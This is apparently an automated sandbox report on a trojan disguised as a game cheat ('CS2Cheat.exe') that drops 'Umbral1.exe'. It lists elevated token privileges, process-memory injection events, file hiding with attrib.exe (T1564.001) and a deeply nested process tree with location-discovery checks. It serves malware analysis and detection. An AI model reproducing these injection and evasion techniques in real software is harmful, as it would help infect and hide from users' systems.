Token: SeRestorePrivilege	1620	wmic.exe
Token: SeShutdownPrivilege	1620	wmic.exe
Token: SeDebugPrivilege	1620	wmic.exe
Token: SeSystemEnvironmentPrivilege	1620	wmic.exe
Token: SeRemoteShutdownPrivilege	1620	wmic.exe
Token: SeUndockPrivilege	1620	wmic.exe
Token: SeManageVolumePrivilege	1620	wmic.exe
Token: 33	1620	wmic.exe
Token: 34	1620	wmic.exe
Token: 35	1620	wmic.exe
Token: 36	1620	wmic.exe
Token: SeIncreaseQuotaPrivilege	3756	wmic.exe
Token: SeSecurityPrivilege	3756	wmic.exe
Token: SeTakeOwnershipPrivilege	3756	wmic.exe
Token: SeLoadDriverPrivilege	3756	wmic.exe
Token: SeSystemProfilePrivilege	3756	wmic.exe
Token: SeSystemtimePrivilege	3756	wmic.exe
Token: SeProfSingleProcessPrivilege	3756	wmic.exe
Token: SeIncBasePriorityPrivilege	3756	wmic.exe
Token: SeCreatePagefilePrivilege	3756	wmic.exe
Token: SeBackupPrivilege	3756	wmic.exe
Token: SeRestorePrivilege	3756	wmic.exe
Token: SeShutdownPrivilege	3756	wmic.exe
Token: SeDebugPrivilege	3756	wmic.exe
Token: SeSystemEnvironmentPrivilege	3756	wmic.exe
Token: SeRemoteShutdownPrivilege	3756	wmic.exe
Token: SeUndockPrivilege	3756	wmic.exe
Token: SeManageVolumePrivilege	3756	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

CS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeUmbral1.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exeCS2Cheat.exe

description	pid	process	target process
PID 4004 wrote to memory of 1684	4004	CS2Cheat.exe	CS2Cheat.exe
PID 4004 wrote to memory of 1684	4004	CS2Cheat.exe	CS2Cheat.exe
PID 4004 wrote to memory of 1684	4004	CS2Cheat.exe	CS2Cheat.exe
PID 4004 wrote to memory of 2420	4004	CS2Cheat.exe	Umbral1.exe
PID 4004 wrote to memory of 2420	4004	CS2Cheat.exe	Umbral1.exe
PID 1684 wrote to memory of 3192	1684	CS2Cheat.exe	CS2Cheat.exe
PID 1684 wrote to memory of 3192	1684	CS2Cheat.exe	CS2Cheat.exe
PID 1684 wrote to memory of 3192	1684	CS2Cheat.exe	CS2Cheat.exe
PID 1684 wrote to memory of 2716	1684	CS2Cheat.exe	Umbral1.exe
PID 1684 wrote to memory of 2716	1684	CS2Cheat.exe	Umbral1.exe
PID 3192 wrote to memory of 2292	3192	CS2Cheat.exe	CS2Cheat.exe
PID 3192 wrote to memory of 2292	3192	CS2Cheat.exe	CS2Cheat.exe
PID 3192 wrote to memory of 2292	3192	CS2Cheat.exe	CS2Cheat.exe
PID 3192 wrote to memory of 4136	3192	CS2Cheat.exe	wmiprvse.exe
PID 3192 wrote to memory of 4136	3192	CS2Cheat.exe	wmiprvse.exe
PID 2292 wrote to memory of 3676	2292	CS2Cheat.exe	Umbral1.exe
PID 2292 wrote to memory of 3676	2292	CS2Cheat.exe	Umbral1.exe
PID 2292 wrote to memory of 3676	2292	CS2Cheat.exe	Umbral1.exe
PID 2292 wrote to memory of 4260	2292	CS2Cheat.exe	Umbral1.exe
PID 2292 wrote to memory of 4260	2292	CS2Cheat.exe	Umbral1.exe
PID 2420 wrote to memory of 776	2420	Umbral1.exe	Umbral1.exe
PID 2420 wrote to memory of 776	2420	Umbral1.exe	Umbral1.exe
PID 3676 wrote to memory of 1484	3676	CS2Cheat.exe	CS2Cheat.exe
PID 3676 wrote to memory of 1484	3676	CS2Cheat.exe	CS2Cheat.exe
PID 3676 wrote to memory of 1484	3676	CS2Cheat.exe	CS2Cheat.exe
PID 2420 wrote to memory of 2392	2420	Umbral1.exe	powershell.exe
PID 2420 wrote to memory of 2392	2420	Umbral1.exe	powershell.exe
PID 3676 wrote to memory of 2236	3676	CS2Cheat.exe	Umbral1.exe
PID 3676 wrote to memory of 2236	3676	CS2Cheat.exe	Umbral1.exe
PID 1484 wrote to memory of 5036	1484	CS2Cheat.exe	CS2Cheat.exe
PID 1484 wrote to memory of 5036	1484	CS2Cheat.exe	CS2Cheat.exe
PID 1484 wrote to memory of 5036	1484	CS2Cheat.exe	CS2Cheat.exe
PID 1484 wrote to memory of 2984	1484	CS2Cheat.exe	Umbral1.exe
PID 1484 wrote to memory of 2984	1484	CS2Cheat.exe	Umbral1.exe
PID 5036 wrote to memory of 2396	5036	CS2Cheat.exe	Umbral1.exe
PID 5036 wrote to memory of 2396	5036	CS2Cheat.exe	Umbral1.exe
PID 5036 wrote to memory of 2396	5036	CS2Cheat.exe	Umbral1.exe
PID 5036 wrote to memory of 2732	5036	CS2Cheat.exe	Umbral1.exe
PID 5036 wrote to memory of 2732	5036	CS2Cheat.exe	Umbral1.exe
PID 2396 wrote to memory of 4220	2396	CS2Cheat.exe	CS2Cheat.exe
PID 2396 wrote to memory of 4220	2396	CS2Cheat.exe	CS2Cheat.exe
PID 2396 wrote to memory of 4220	2396	CS2Cheat.exe	CS2Cheat.exe
PID 2396 wrote to memory of 4912	2396	CS2Cheat.exe	CS2Cheat.exe
PID 2396 wrote to memory of 4912	2396	CS2Cheat.exe	CS2Cheat.exe
PID 2420 wrote to memory of 4600	2420	Umbral1.exe	powershell.exe
PID 2420 wrote to memory of 4600	2420	Umbral1.exe	powershell.exe
PID 4220 wrote to memory of 2660	4220	CS2Cheat.exe	CS2Cheat.exe
PID 4220 wrote to memory of 2660	4220	CS2Cheat.exe	CS2Cheat.exe
PID 4220 wrote to memory of 2660	4220	CS2Cheat.exe	CS2Cheat.exe
PID 4220 wrote to memory of 2232	4220	CS2Cheat.exe	Umbral1.exe
PID 4220 wrote to memory of 2232	4220	CS2Cheat.exe	Umbral1.exe
PID 2660 wrote to memory of 2972	2660	CS2Cheat.exe	CS2Cheat.exe
PID 2660 wrote to memory of 2972	2660	CS2Cheat.exe	CS2Cheat.exe
PID 2660 wrote to memory of 2972	2660	CS2Cheat.exe	CS2Cheat.exe
PID 2660 wrote to memory of 1852	2660	CS2Cheat.exe	Umbral1.exe
PID 2660 wrote to memory of 1852	2660	CS2Cheat.exe	Umbral1.exe
PID 2972 wrote to memory of 5032	2972	CS2Cheat.exe	CS2Cheat.exe
PID 2972 wrote to memory of 5032	2972	CS2Cheat.exe	CS2Cheat.exe
PID 2972 wrote to memory of 5032	2972	CS2Cheat.exe	CS2Cheat.exe
PID 2972 wrote to memory of 4336	2972	CS2Cheat.exe	Umbral1.exe
PID 2972 wrote to memory of 4336	2972	CS2Cheat.exe	Umbral1.exe
PID 5032 wrote to memory of 4536	5032	CS2Cheat.exe	CS2Cheat.exe
PID 5032 wrote to memory of 4536	5032	CS2Cheat.exe	CS2Cheat.exe
PID 5032 wrote to memory of 4536	5032	CS2Cheat.exe	CS2Cheat.exe

Views/modifies file attributes 1 TTPs 26 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
972	attrib.exe
4952	attrib.exe
744
776	attrib.exe
2892	attrib.exe
4352	attrib.exe
3088
1248
4480
3664
1164	attrib.exe
2208
2692
2688
5092
2260
3264
2480
372	attrib.exe
372	attrib.exe
4536	attrib.exe
712	attrib.exe
4400
2892
4404
4388

C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
"C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4004
- C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
  "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
    "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3192
  - - C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
      "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2292
    - - C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3676
      - C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2660
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        15⤵
        Executes dropped EXE
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        17⤵
        Executes dropped EXE
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        18⤵
        Executes dropped EXE
        
        PID:4624
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        19⤵
        Executes dropped EXE
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        20⤵
        Executes dropped EXE
        
        PID:3960
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:64
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        22⤵
        Executes dropped EXE
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        24⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        25⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:384
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        26⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        28⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        30⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        31⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        32⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        33⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        34⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        35⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2732
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        36⤵
        
        PID:2932
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        37⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        38⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        39⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        40⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        41⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        42⤵
        Checks computer location settings
        
        PID:3628
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        43⤵
        System Location Discovery: System Language Discovery
        
        PID:1164
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        44⤵
        Checks computer location settings
        
        PID:3040
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        45⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        46⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        47⤵
        System Location Discovery: System Language Discovery
        
        PID:4368
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        48⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        49⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        50⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        51⤵
        System Location Discovery: System Language Discovery
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        52⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        53⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        54⤵
        System Location Discovery: System Language Discovery
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        55⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        56⤵
        System Location Discovery: System Language Discovery
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        57⤵
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        58⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2196
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        59⤵
        System Location Discovery: System Language Discovery
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        60⤵
        System Location Discovery: System Language Discovery
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        61⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        62⤵
        Checks computer location settings
        
        PID:384
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        63⤵
        Checks computer location settings
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        64⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        65⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        66⤵
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        67⤵
        Checks computer location settings
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        68⤵
        Checks computer location settings
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        69⤵
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        70⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        71⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        72⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        73⤵
        Checks computer location settings
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        74⤵
        System Location Discovery: System Language Discovery
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        75⤵
        System Location Discovery: System Language Discovery
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        76⤵
        Checks computer location settings
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        77⤵
        System Location Discovery: System Language Discovery
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        78⤵
        System Location Discovery: System Language Discovery
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        79⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        80⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        81⤵
        System Location Discovery: System Language Discovery
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        82⤵
        System Location Discovery: System Language Discovery
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        83⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        84⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        85⤵
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        86⤵
        System Location Discovery: System Language Discovery
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        87⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        88⤵
        Checks computer location settings
        
        PID:364
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        89⤵
        Checks computer location settings
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        90⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        91⤵
        System Location Discovery: System Language Discovery
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        92⤵
        System Location Discovery: System Language Discovery
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        93⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        94⤵
        Checks computer location settings
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        95⤵
        Checks computer location settings
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        96⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        97⤵
        Checks computer location settings
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        98⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        99⤵
        Checks computer location settings
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        100⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        101⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        102⤵
        Checks computer location settings
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        103⤵
        Checks computer location settings
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        104⤵
        Checks computer location settings
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        105⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CS2Cheat.exe"
        106⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
